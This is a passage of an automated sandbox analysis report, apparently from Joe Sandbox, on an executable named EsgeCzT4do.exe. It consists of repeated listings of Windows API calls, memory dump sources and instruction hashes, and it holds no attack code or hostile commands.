                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                                                                                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 87ccbfffecd7de7467de5c73c2002d88ab1ef4389744f866cc51cf150fc0b97d
                                                                                                                                                                                                                                                                                      • Instruction ID: aab1c47b15b7d7dbd0304e6a384de86cdfdd1b9a1951722987da620561d60ced
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87ccbfffecd7de7467de5c73c2002d88ab1ef4389744f866cc51cf150fc0b97d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45117F71A00009FFDF219F91DE49DAF3B69EB14394B004076FA06F00A0DBB49E52AF69
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 00401CC5
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CD2
                                                                                                                                                                                                                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 80015c0295c996dc09a7a69a0851128c21454d925603859c5d6fd9af08ddf10e
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b6a49845d72fa48a9a579b1019c06f6c105053db178aa5042bb0eadc5b1df39
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80015c0295c996dc09a7a69a0851128c21454d925603859c5d6fd9af08ddf10e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0EC72A04114AFEB00EBA4DD88DAFB77CFB44305B044536F501F6191C678AD419B79
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0042A0C0,0042A0C0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040456D,000000DF,00000000,00000400,?), ref: 004046F0
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004046F8
                                                                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0042A0C0), ref: 0040470B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                      • Opcode ID: d983c73ecadd4704cc9d524db0130b413f0ba163b4f455c9b7d3e0c477023978
                                                                                                                                                                                                                                                                                      • Instruction ID: cfc8e6c3a4af003209a53fcdfac8cba24e816d3e629d82a7997265ded69b8fd0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d983c73ecadd4704cc9d524db0130b413f0ba163b4f455c9b7d3e0c477023978
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0112773A0412827EB0065699C45EAF3298DB86334F254637FE25F71D1E9799C1285EC
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                      • Opcode ID: e392da7139347f63c408211002f75456f017542e4151f627b34d3607e76d39d5
                                                                                                                                                                                                                                                                                      • Instruction ID: e2d4d96ca7e059e12ef29128c845d67dbcf5a6688523181a8ec59df7cc8b106d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e392da7139347f63c408211002f75456f017542e4151f627b34d3607e76d39d5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B021A171A44208BFEF01AFB5CD8AAAE7B75EF44344F14407AF501BA1D1D6B88A40DB29
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 0040569A
                                                                                                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 004056A3
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00409010), ref: 004056B4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405694
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                                      • API String ID: 2659869361-823278215
                                                                                                                                                                                                                                                                                      • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                                                                                                                                                                                      • Instruction ID: 3169b85a74bfaa55460b422d3e3fbca7e168afda588c61a1877893bbaf19970e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25D0A972606A302EE20226158C05F8B3A28CF52301B0448A2F640B22D2C7BC7E818FFE
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: lstrlenA.KERNEL32(00429898,00000000,004193F1,759223A0,?,?,?,?,?,?,?,?,?,00402FCC,00000000,?), ref: 00404EC6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: lstrlenA.KERNEL32(00402FCC,00429898,00000000,004193F1,759223A0,?,?,?,?,?,?,?,?,?,00402FCC,00000000), ref: 00404ED6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: lstrcatA.KERNEL32(00429898,00402FCC,00402FCC,00429898,00000000,004193F1,759223A0), ref: 00404EE9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SetWindowTextA.USER32(00429898,00429898), ref: 00404EFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F3B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2987980305-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a8bda000f72a175a0f0ed6af68dae75491426ca2de135a58b3756a98873c7a0f
                                                                                                                                                                                                                                                                                      • Instruction ID: c2750792bbdc63a1f1471102f5095df33ec689d5572da80d747626f78b0a8a56
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8bda000f72a175a0f0ed6af68dae75491426ca2de135a58b3756a98873c7a0f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86210B32904115BBDF206FA5CE8CA6E3571BF44358F20423BF901B62E1DBBC49419A5E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0040A460,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                                                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,?,?,0040A460,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A460,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1356686001-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b6f4f247d7d0ae3319dc5e24e2c3de07eca660428b233407ae8b6eb34338d133
                                                                                                                                                                                                                                                                                      • Instruction ID: 87e3eab27a64c54b83edf31c6fc5fb34a185908cb1e9cfdfcb2c5e910e3a0e9b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6f4f247d7d0ae3319dc5e24e2c3de07eca660428b233407ae8b6eb34338d133
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74116371E00108BEEB10EFB5DE89EAF7A79EB50358F10403AF905B61D1D6B85D019A69
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401D22
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(0040B064), ref: 00401D8A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirect
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3272661963-0
                                                                                                                                                                                                                                                                                      • Opcode ID: accc13d48f6054b699412ffc7b69af88873056f9434b3b193c5cf8f27c425f12
                                                                                                                                                                                                                                                                                      • Instruction ID: 5e6b0a242ffc9277152ed6cf63edc70abaf129c53bcded44f01e7363494148ce
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: accc13d48f6054b699412ffc7b69af88873056f9434b3b193c5cf8f27c425f12
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BF04471E89240AEE7016770AF1AB9B7F64D715305F104475F651B62E2C77914048BAE
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,00402DB4,00000001), ref: 00402BE7
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402C05
                                                                                                                                                                                                                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C22
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C30
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b254695f6d3024de6991e78bd902d51a9eabd2695cbf76f56ec73d281620ca3d
                                                                                                                                                                                                                                                                                      • Instruction ID: fe7f2a60441318f0c2a90f6d59b101c1e11520174a0dcb1e75ef42172c75ba50
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b254695f6d3024de6991e78bd902d51a9eabd2695cbf76f56ec73d281620ca3d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF05470A0D121ABD6746F55FE8CD8B7BA4F744B017540576F000B11A4DA785882CFAD
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00000000,0042E440), ref: 00403955
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: TextWindow
                                                                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\EsgeCzT4do.exe"$1033
                                                                                                                                                                                                                                                                                      • API String ID: 530164218-3802188206
                                                                                                                                                                                                                                                                                      • Opcode ID: 955c230c1abd7d31e01fa39c2c33e1942ba3e2693a8a1108e72f80aea9af70c5
                                                                                                                                                                                                                                                                                      • Instruction ID: 93100a74eb761491cad5589d5ba72450eee8ba09b7e289b8bdcf135b4c9a781b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 955c230c1abd7d31e01fa39c2c33e1942ba3e2693a8a1108e72f80aea9af70c5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A611F071B006108BC730EF56DC80A773BACEB85715368813BA801A73A0CA39AD028B9C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00404E13
                                                                                                                                                                                                                                                                                      • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E81
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EA9: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EBB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
